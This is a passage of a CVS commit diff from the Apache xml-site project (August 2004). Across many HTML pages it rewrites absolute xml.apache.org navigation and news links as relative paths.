href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.46 +13 -13 xml-site/targets/communication.html Index: communication.html =================================================================== RCS file: /home/cvs/xml-site/targets/communication.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- communication.html 26 Aug 2004 20:31:56 -0000 1.45 +++ communication.html 31 Aug 2004 03:35:24 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.44 +13 -13 xml-site/targets/contact.html Index: contact.html =================================================================== RCS file: /home/cvs/xml-site/targets/contact.html,v retrieving revision 1.43 retrieving revision 1.44 diff -u -r1.43 -r1.44 --- contact.html 26 Aug 2004 20:31:56 -0000 1.43 +++ contact.html 31 Aug 2004 03:35:24 -0000 1.44 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.52 +13 -13 xml-site/targets/cvs.html Index: cvs.html =================================================================== RCS file: /home/cvs/xml-site/targets/cvs.html,v retrieving revision 1.51 retrieving revision 1.52 diff -u -r1.51 -r1.52 --- cvs.html 26 Aug 2004 20:31:56 -0000 1.51 +++ cvs.html 31 Aug 2004 03:35:24 -0000 1.52 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.46 +13 -13 xml-site/targets/decisions.html Index: decisions.html =================================================================== RCS file: /home/cvs/xml-site/targets/decisions.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- decisions.html 26 Aug 2004 20:31:56 -0000 1.45 +++ decisions.html 31 Aug 2004 03:35:24 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.54 +13 -13 xml-site/targets/guidelines.html Index: guidelines.html =================================================================== RCS file: /home/cvs/xml-site/targets/guidelines.html,v retrieving revision 1.53 retrieving revision 1.54 diff -u -r1.53 -r1.54 --- guidelines.html 26 Aug 2004 20:31:57 -0000 1.53 +++ guidelines.html 31 Aug 2004 03:35:24 -0000 1.54 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.65 +13 -13 xml-site/targets/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/index.html,v retrieving revision 1.64 retrieving revision 1.65 diff -u -r1.64 -r1.65 --- index.html 26 Aug 2004 20:31:57 -0000 1.64 +++ index.html 31 Aug 2004 03:35:24 -0000 1.65 @@ -116,37 +116,37 @@ <font color="#CFDCED">Projects</font> <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> <a href="http://forrest.apache.org/">Forrest</a> </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> <a href="http://axkit.org">AxKit</a> @@ -182,13 +182,13 @@ <font color="#CFDCED">Hibernated Projects</font> <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> </li> 1.46 +13 -13 xml-site/targets/legal.html Index: legal.html =================================================================== RCS file: /home/cvs/xml-site/targets/legal.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- legal.html 26 Aug 2004 20:31:57 -0000 1.45 +++ legal.html 31 Aug 2004 03:35:24 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.48 +13 -13 xml-site/targets/library.html Index: library.html =================================================================== RCS file: /home/cvs/xml-site/targets/library.html,v retrieving revision 1.47 retrieving revision 1.48 diff -u -r1.47 -r1.48 --- library.html 26 Aug 2004 20:31:57 -0000 1.47 +++ library.html 31 Aug 2004 03:35:24 -0000 1.48 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.56 +13 -13 xml-site/targets/mail.html Index: mail.html =================================================================== RCS file: /home/cvs/xml-site/targets/mail.html,v retrieving revision 1.55 retrieving revision 1.56 diff -u -r1.55 -r1.56 --- mail.html 26 Aug 2004 20:31:57 -0000 1.55 +++ mail.html 31 Aug 2004 03:35:24 -0000 1.56 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.46 +13 -13 xml-site/targets/management.html Index: management.html =================================================================== RCS file: /home/cvs/xml-site/targets/management.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- management.html 26 Aug 2004 20:31:57 -0000 1.45 +++ management.html 31 Aug 2004 03:35:24 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.30 +13 -13 xml-site/targets/mirrors.html Index: mirrors.html =================================================================== RCS file: /home/cvs/xml-site/targets/mirrors.html,v retrieving revision 1.29 retrieving revision 1.30 diff -u -r1.29 -r1.30 --- mirrors.html 26 Aug 2004 20:31:57 -0000 1.29 +++ mirrors.html 31 Aug 2004 03:35:24 -0000 1.30 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.48 +13 -13 xml-site/targets/mission.html Index: mission.html =================================================================== RCS file: /home/cvs/xml-site/targets/mission.html,v retrieving revision 1.47 retrieving revision 1.48 diff -u -r1.47 -r1.48 --- mission.html 26 Aug 2004 20:31:57 -0000 1.47 +++ mission.html 31 Aug 2004 03:35:25 -0000 1.48 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> 1.66 +21 -21 xml-site/targets/news.html Index: news.html =================================================================== RCS file: /home/cvs/xml-site/targets/news.html,v retrieving revision 1.65 retrieving revision 1.66 diff -u -r1.65 -r1.66 --- news.html 26 Aug 2004 20:31:57 -0000 1.65 +++ news.html 31 Aug 2004 03:35:25 -0000 1.66 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a href="/batik/">Batik</a> </li> <li> -<a href="http://xml.apache.org/commons/">XML Commons</a> +<a href="/commons/">XML Commons</a> </li> <li> -<a href="http://xml.apache.org/security/index.html">XML Security</a> +<a href="/security/">XML Security</a> </li> <li> -<a href="http://xml.apache.org/xindice/">Xindice</a> +<a href="/xindice/">Xindice</a> </li> <li> @@ -209,16 +209,16 @@ <ul> <li> -<a href="http://xml.apache.org/xerces-j/index.html">Xerces Java 1</a> +<a href="/xerces-j/">Xerces Java 1</a> </li> <li> -<a href="http://xml.apache.org/xang/index.html">Xang</a> +<a href="/xang/">Xang</a> </li> <li> -<a href="http://xml.apache.org/crimson/index.html">Crimson</a> +<a href="/crimson/">Crimson</a> </li> </ul> @@ -482,7 +482,7 @@ <div style="margin-left: 0 ; border: 2px"> <p> Xerces-J 2.6.1 is now available from the Xerces-J - <a href="http://xml.apache.org/xerces2-j/">site</a>. + <a href="/xerces2-j/">site</a>. </p> <p> Changes include : @@ -522,7 +522,7 @@ <div style="margin-left: 0 ; border: 2px"> <p> Xalan-C++ 1.7 is now officially available from the Xalan-C++ - <a href="http://xml.apache.org/xalan-c">site</a>. + <a href="/xalan-c/">site</a>. </p> <p> Changes include : @@ -545,11 +545,11 @@ <p> Xerces-C++ Version 2.4 has now been released, and is available from the Xerces-C++ - <a href="http://xml.apache.org/xerces-c">site</a>. + <a href="/xerces-c/">site</a>. </p> <p> Information on changes can be found - <a href="http://xml.apache.org/xerces-c/releases.html">here</a>. + <a href="/xerces-c/releases.html">here</a>. </p> </div> <a name="N1009C"></a><a name="apachecon-us-2003"></a> @@ -568,7 +568,7 @@ <h4>XML Commons Resolver 1.1 released (November 5, 2003)</h4> <div style="margin-left: 0 ; border: 2px"> <p> - See the <a href="http://xml.apache.org/commons/components/resolver/resolver-release-notes.html">changelog</a> for details. + See the <a href="/commons/components/resolver/resolver-release-notes.html">changelog</a> for details. </p> </div> <a name="N100B8"></a><a name="xml-xalan-j-2.5.2"></a> @@ -598,7 +598,7 @@ <p> Beta release with some new functionality and updated documentation to match Forrestized website. Expect a 1.1 release in time for the next Ant release, which bundles Resolver. - See the <a href="http://xml.apache.org/commons/components/resolver/resolver-release-notes.html">changelog</a> for details. + See the <a href="/commons/components/resolver/resolver-release-notes.html">changelog</a> for details. </p> </div> <a name="N100DA"></a><a name="forrest-0.5.1"></a> @@ -639,7 +639,7 @@ The release can be downloaded from <a href="http://xml.apache.org/dist/xerces-j/">http://xml.apache.org/dist/xerces-j/</a> </p> <p> - For more information, visit the <a href="http://xml.apache.org/xerces2-j/">Apache Xerces2 Java Parser Project WebSite</a>. + For more information, visit the <a href="/xerces2-j/">Apache Xerces2 Java Parser Project WebSite</a>. </p> </div> <a name="N1011E"></a><a name="fop-0.20.5"></a> @@ -885,7 +885,7 @@ <li> Apache forms xml.apache.org -- - <a target="_top" href="http://xml.apache.org/pr/0001.txt">PRESS RELEASE</a> + <a target="_top" href="/pr/0001.txt">PRESS RELEASE</a> </li> 1.25 +142 -142 xml-site/targets/news.pdf <<Binary file>> 1.46 +13 -13 xml-site/targets/overview.html Index: overview.html =================================================================== RCS file: /home/cvs/xml-site/targets/overview.html,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- overview.html 26 Aug 2004 20:31:57 -0000 1.45 +++ overview.html 31 Aug 2004 03:35:25 -0000 1.46 @@ -123,27 +123,27 @@ <ul> <li> -<a href="http://xml.apache.org/xerces2-j/index.html">Xerces Java 2</a> +<a href="/xerces2-j/">Xerces Java 2</a> </li> <li> -<a href="http://xml.apache.org/xerces-c/index.html">Xerces C++</a> +<a href="/xerces-c/">Xerces C++</a> </li> <li> -<a href="http://xml.apache.org/xerces-p/index.html">Xerces Perl</a> +<a href="/xerces-p/">Xerces Perl</a> </li> <li> -<a href="http://xml.apache.org/xalan-j/index.html">Xalan Java 2</a> +<a href="/xalan-j/">Xalan Java 2</a> </li> <li> -<a href="http://xml.apache.org/xalan-c/index.html">Xalan C++</a> +<a href="/xalan-c/">Xalan C++</a> </li> <li> -<a href="http://xml.apache.org/fop/index.html">FOP</a> +<a href="/fop/">FOP</a> </li> <li> @@ -151,19 +151,19 @@ </li> <li> -<a href="http://xml.apache.org/batik/index.html">Batik</a> +<a 